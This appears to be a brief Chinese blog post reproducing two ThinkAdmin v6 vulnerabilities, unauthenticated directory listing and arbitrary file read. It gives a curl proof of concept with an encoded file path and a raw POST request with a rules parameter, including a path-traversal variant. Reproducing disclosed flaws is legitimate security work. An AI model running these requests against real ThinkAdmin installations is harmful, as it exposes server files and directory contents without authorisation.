ThinkAdmin v6 未授权列目录/任意文件读取复现

大佬的审计文章：https://github.com/zoujingli/ThinkAdmin/issues/244

任意文件读取

POC

curl http://127.0.0.1/admin.html?s=admin/api.Update/get/encode/1a1a1b1a1a1b1a1a1b2t382r1b342p37373b2s

复现

读取文件的文件路径需要加密

不懂PHP，百度了一下这几个函数的用法，知道加密的流程。

编写脚本

再根本加密流程和请求方式写一个Python脚本，卖个广告：关注微信公众号：T9Sec 获取POC ??

未授权列目录

POC

POST /admin.html?s=admin/api.Update/node HTTP/1.1
Host: 就不告诉你:)
Connection: close
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36 Edg/85.0.564.51
Content-Length: 11

rules=["/"]

复现

路径根据网站来进行目录穿越 rules=["../../../"] 这漏洞不想写POC

ThinkAdmin v6 未授权列目录/任意文件读取复现

原文：https://www.cnblogs.com/yuyan-sec/p/13729604.html